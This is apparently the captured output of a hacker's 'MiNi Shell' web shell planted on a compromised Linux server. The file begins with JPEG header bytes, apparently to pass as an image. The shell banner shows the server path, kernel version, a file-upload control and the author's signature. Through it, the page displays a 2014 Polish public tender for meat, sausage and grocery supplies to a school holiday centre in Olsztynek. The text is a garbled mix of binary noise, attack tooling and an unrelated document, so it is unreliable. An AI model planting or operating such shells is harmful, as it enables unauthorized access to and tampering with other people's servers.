JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140127/30484-N-2014.html

<p class="kh_header"><b>Olsztynek: Sukcesywne dostawy art. spożywczych, mięsa wieprzowo - wołowego, produktów mięsnych, wędlin, oraz mięsa drobiowego.</b><br>
<b>Numer ogłoszenia: 30484 - 2014; data zamieszczenia: 27.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pozaszkolna Placówka Specjalistyczna Szkolny Ośrodek Wypoczynkowy "Syrenka" w Marózie , Maróz 5, 11-015 Olsztynek, woj. warmińsko-mazurskie, tel. 89 513 92 15, faks 89 513 92 15.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> sowsyrenka.bip.um.warszawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy art. spożywczych, mięsa wieprzowo - wołowego, produktów mięsnych, wędlin, oraz mięsa drobiowego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy żywności okreslonej w V pakietach opisanych szczegółowo w specyfikacji asortymentowej załącznik nr. 4 do SIWZ oraz podano ilościowo w formularzu cenowym załącznik nr. 1A do SIWZ tj. Pakiet nr.I wędliny wieprzowo-drobiowe, Pakiet nr.III wędliny drobiowe, Pakiet nr. IV Mięso drobiowe, Pakiet nr.V Art.spożywcze...</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.11.00.00-2, 15.13.11.30-5, 15.13.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku Wykonawca składa oświadczenie zgodne z art.22 ust.1</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku Wykonawca składa oświadczenie zgodne z art.22 ust.1</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku Wykonawca składa oświadczenie zgodne z art.22 ust.1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku Wykonawca składa oświadczenie zgodne z art.22 ust.1</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku Wykonawca składa oświadczenie zgodne z art.22 ust.1</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)formularz OFERTA 2)FORMULARZ CENOWY -stosownie do złozonego pakietu 3) ważną decyzję o dopuszczeniu samochodu do przewozu żywności HDI (Dz. U z 2003r. Nr 21 poz.179), którym będzie świadczona usługa, 4)oświadczenie, że zakład ma wdrożony system HACCP lub GMP i GHP;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> sowsyrenka.bip.um.warszawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamawiającego Budynek Złota Rybka - sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.02.2014 godzina 09:00, miejsce: Zamawiającego Budynek Złota Rybka - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kiełbasa jałowcowa	 kg 	40 kiełbasa biała surowa wieprzowa	 kg 	150 kiełbasa biała parzona wieprzowa	 kg 	10 kiełbasa cytrynówka	kg	45 kiełbasa piwna 	 kg 	45 kiełbasa szynkówka	kg	30 kiełbasa szynkowa 	 kg 	80 kiełbasa krakowska parzona	 kg 	80 kiełbasa krakowska sucha	 kg 	45 luncheon królewski	kg	60 żywiecka parzona	kg	40 kiełbasa żywiecka sucha	 kg 	45 kiełbasa metka cebulowa	 kg 	5 kiełbasa metka łososiowa	 kg 	5
kiełbasa myśliwska	 kg 	5 kiełbasa salami	 kg 	65 szynka mielona	 kg 	60 szynka konserwowa wieprzowa	 kg 	80 golonka konserwowa 	 kg 	20 kiełbasa zwyczajna 	 kg 	150 kiełbasa toruńska	 kg 	50 kiełbasa podwawelska	kg	50 kiełbasa francuska	kg	150 kabanosy	 kg 	10 kiełbasa śląska	 kg 	200 kiełbasa tyrolska	 kg 	50 polęwica sopocka	 kg 	200
polędwica krotoszyńska	 kg 	150 polędwica łososiowa	kg	50 ogonówka 	 kg 	160
baleron 	 kg 	100 szynka wędz 	 kg 	150 szynka gotowana  	 kg 	100 boczek wędzony parzony b/k	 kg 	100 rolada boczkowa	kg	10 słonia wędzona	 kg 	2 kaszanka gryczana	 kg 	40 kaszanka jęczmienna	 kg 	50 kiszka ziemniaczana	 kg 	30 salceson włoski	 kg 	20 salceson ozorkowy	 kg 	20 pasztet wieprzowy	 kg 	40 pasztetowa podwędzana	kg	20
pasztetowa 	 kg 	60 kości schabowe wędzone	 kg 	20 berlinki	kg	150 parówki wieprzowe cienkie 	 kg 	150 łopatka parzona z przyprawami	kg	80 frankfuterki	kg	80 serdelki wieprzowe	 kg 	150 mortadela 	 kg 	150 pieczeń wieprzowa	kg	60 pieczeń litewska	kg	30 schab pieczony	kg	10 mortadela z przyprawami	 kg 	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Mięso wieprzowo - wołowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> antrykot wołowy b/k	 kg 	10 wołowina zrazowa b/k	 kg 	10 karkówka wieprzowa b/k	 kg 	300
łopatka wieprzowa b/k	 kg 	150 schab z k 	kg	70 schab b/k	 kg 	380 szynka wieprzowa b/k	 kg 	50 mięso  wieprzowe drobne b/k	 kg 	700 żeberka wieprzowe grube	 kg 	150 boczek świeży b/ż	 kg 	80 pachwina	 kg 	5 golonka wp	 kg 	10 kości schabowe 	 kg 	220 słonina	 kg 	30 nogi wieprzowe	 kg 	10 flaki wołowe	kg	30 wątroba wieprzowa	 kg 	100
polędwiczka wieprzowa	kg	50 ozory	kg 	10 smalec wieprzowy 	 kg 	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.10.00-9, 15.11.30.00-3, 15.11.11.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wędliny Drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> szynka drobiowa kg 80 pierś wędzona z indyka kg 5 pierś wędzona z kurczaka kg 5 indyk faszerowany kg 20 kiełbasa szynkowa drobiowa kg 20 polędwica drobiowa z majerankiem kg 20 polędwica miodowa kg 60 parówki drobiowe cienkie kg 60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.35-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Mięso drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filet z kurczaka b/s kg 330 filet z indyka b/s kg 130 kurczaki kg 250 skrzydełka z kurczaka kg 170
ćwiartka z kurczak kg 450 pałki z kurczaka kg 160 wątróbka z kurczaka kg 10 serca drobiowe kg 40
żołądki z kurczaka kg 50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.11.23.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Artykuły ogólnospożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas konserwowy kg 35 brzoskwinia konserwowa kg 30 mandarynka konserwowa 	 kg 12 rodzynki suszone kg 15 syrop owocowy kg 30 rosół z kury kg 12 bulion grzybowy kg 1 bulion warzywny 	 kg 1
bulion wołowy kg 1 sos pieczeniowy kg 1 sos tabasco l 1 sos myśliwski kg 1 sos ogrodowy,sałatkowy  kg 12 sos słodko kwaśny kg 1 sos z zielonym pieprzem	kg 1 sos węgierski kg 1 sos grzybowy	kg 5
zupa cebulowa kg 2 sos boloński 	l 10 zupa w proszku-żurek 	 kg 6 barszcz w proszku czerwony	 kg 15 budyń kg 	12 galaretka owocowa kg 20 żelatyna spożywcza drobiowa kg 5 kisiel kg 15 wiórki kokosowe kg 1 soda kg 1 cukier waniliowy kg 15 cynamon mielony kg 1 drożdże suszone kg 3 gałka muszkatołowa mielona  kg 1 goździk kg 1 kwasek cytrynowy  kg 20 liść laurowy  kg 1 majeranek  	 kg 3 papryka mielona słodka kg 10 chilii	 kg 1 pieprz biały kg 2 pieprz naturalny mielony kg 15 proszek do pieczenia kg 2 kminek kg 1 oregano	 kg 	1 owoc jałowca suszony kg 	1 przyprawa w płynie kg 10
przyprawa warzywna kg 200  migdały	 kg 	1 pieprz ziołowy	 kg 	1 rozmaryn kg 	1 orzechy laskowe kg 1 orzechy włoskie	 kg 	1 imbir mielony	 kg 	1 kolendra	 kg 	1 sezam	 kg 	1
przyprawa do flaków	 kg 	1 przyprawa do drobiu kg 	6 przyprawa do ryb kg 1 przyprawa gyros	 kg 10 przyprawa do mięs	 kg 	3 przyprawa do grila	 kg 	1 przyprawa carry	 kg 	1
przyprawa bazylia	 kg 	1 przyprawa kebab	kg	1 przyprawa do karkówki	kg	3
przyprawa tymianek	 kg 	1 ziele angielskie 	 kg 	1 zioła prowensalskie 	 kg 	1 czosnek granulowany	 kg 	12 cukier biały kryształ 	 kg 	1900 cukier biały kryształ kostka	 kg 	5
cukier biały kryształ saszetka 	 kg 	5 cukier puder  	 kg 	45 kasza gryczana prażona	 kg 	80
kasza jaglana	kg	25 kasza kuskus	kg	25 kasza jęczmienna  srednia	 kg 	30 kasza jęczmienna  gruba	 kg 	30 kasza manna 	 kg 	20 fasola sucha średnia	 kg 	20
fasola sucha jaś	 kg 	20 groch łuskany połółwki	 kg 	20 makaron  nitki cięte	 kg 	50
makaron  spagetti	 kg 	80 makaron  kolanka	 kg 	50 makaron  świderki	 kg 	80 makaron  muszelki	 kg 	40 makaron  zacierka	 kg 	45 makaron  łazanki	 kg 	50 makaron  wstążki	 kg 	30 makaron  gniazdka	 kg 	30 mąka pszenna  typ 550	 kg 	1200 mąka ziemniaczana  	 kg 	30
płatki kukurydziane 	 kg 	50 płatki zbożowe miodowe	 kg 	10 płatki zbożowe orzechowe	 kg 	10 płatki zbożowe czekoladowe	 kg 	60 płatki owsiane kg 	10 ryż biały  kg 	180 ryż ciemny  	 kg 	5
sól kuchenna kg 	220 chrzan tarty w occie kg 	10 ćwikła kg 3 ketchup łagodny	 kg 	380 ketchup w saszetkach	 kg 	5 musztarda zwykła	 kg 40 musztarda francuska	 kg 2 musztarda sarepska	kg40 musztarda w saszetkach	 kg 	5 fasolka szparagowa konserwowa kg 	45 fasola czerwona konserwowa kg 	30 fasola biała konserwowa 	 kg 	5 groszek konserwowy kg 	20 koncentrat pomidorowy 30% kg 	130 ogórek korniszon 	 kg 	380 oliwki konserwowe  	 kg 	12 papryka konserwowa 	 kg 	160 szczaw konserwowy 	 kg 	60 kukurydza konserwowa 	 kg 	130
majonez 	 kg 	230 cebula perłowa w zalewie octowej 	 kg 	3 czosnek marynowany 	 kg 	3
kukurydza konserwowa minikolby kg 3 pieczarka konserwowa 	 kg 	10 pomidory konserwowe kg 10
ocet	  l	140 sok pomidorowy	  l10  dżem różne smaki kg 	200 dżem w saszetkach 25g (różne smaki)kg 	5 powidła śliwkowe	 kg 	35 żurawina kg 	10 miód naturalny kg 	8 miód w saszetkach	 kg 	3 olej słonecznikowy  l 1 olej sojowy l 1 olej rzepakowy l 1400 oliwa z oliwek 	 l 10
papryka szcz kg 	60 konserwa rybna makrela w pomidorach kg 	35 konserwa rybna makrelaw oleju	 kg 	25 konserwa rybna szprot w oleju kg 5 konserwa rybna szprot w pomidorach	 kg 	5
konserwa rybna śledź w oleju kg 	5 konserwa rybna śledź w pomidorach	 kg 	5 szprot podwędzany w oleju	 kg 	5 tuńczyk sałatkowy	 kg 	5 pasztet z indyka kg 	10 łopatka konserwowa kg 	5
szynka konserwowa 	 kg 	5 napój owocowy karton 1 l	 l 1000 sok  owocowy karton 1 l	 l 30
woda smak n/g gaz 0,5 l l 100 napój owocowy karton 0,2 l	 l 	80 woda mineralna n/ gaz 1,5 	 l 300 woda mineralna n/g 6l	l	1200 woda mineralna  gaz 1,5 	 l 	300 woda mineralna niegaz./gaz  500ml l 1900 herbata ekspresowa z zawieszką	 kg 	20 herbata expresowa  	 kg 	30 kakao opak	 kg 	15 kawa  rozpuszczalna w saszetkach  	 kg 	15 kawa naturalna mielona 	 kg 	25 kawa naturalna rozpuszczalna 	 kg 	12 kawa capucino 	 kg 	1 kawa capucino w saszetkach	 kg 	1 herbatniki	 kg 	85 herbatniki w polewie	kg	10 paluszki słone	 kg 	55
baton  czekoladowy z orzechami 	 kg 	25 baton czekoladowy z karmelem	 kg 	50
baton czekoladowy z nadzieniem mlecznym	 kg 	30 baton czekoladowy z nadzieniem owocowym	 kg 	10 wafel przekładany  w polewie czekoladowej 	 kg 	50 biszkopt oblany z jednej strony galaretką i polewą czekoladową	 kg 	5 wafle kakaowe w polewie luz	 kg 	10 wafle kakaowe bez polewy luz	 kg 	10 pierniki w czekoladzie luz	 kg 	30 markizy luz	 kg 	15 czekolada mleczna tabliczka g	 kg 	5 czekolada nadziewana tabliczka g	 kg 	5 czekolada z bakaliami tabliczka g	 kg 	5 ptasie mleczko smak	 kg 	5 cukierki witaminizowane	 kg 	5 krem czekoladowy	 kg 	45
kotlet sojowy	kg	2 ciastka zbożowe	kg	15 rurki z nadzieniem luz	kg	20 biszkopty	kg	5 frytura do smażenia	l	50  bakalie mieszanka	kg	3 pasztet sojowy	kg	15
lizak	kg	15 pasta do kanapek	kg	5 sos owocowy	l	10 pestki dyni	kg	5 słonecznik łuskany	kg	5 sezamki	kg	5 posypka dekoracyjna	kg	3 sos sojowy	l 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.20.00.00-0, 15.32.00.00-7, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com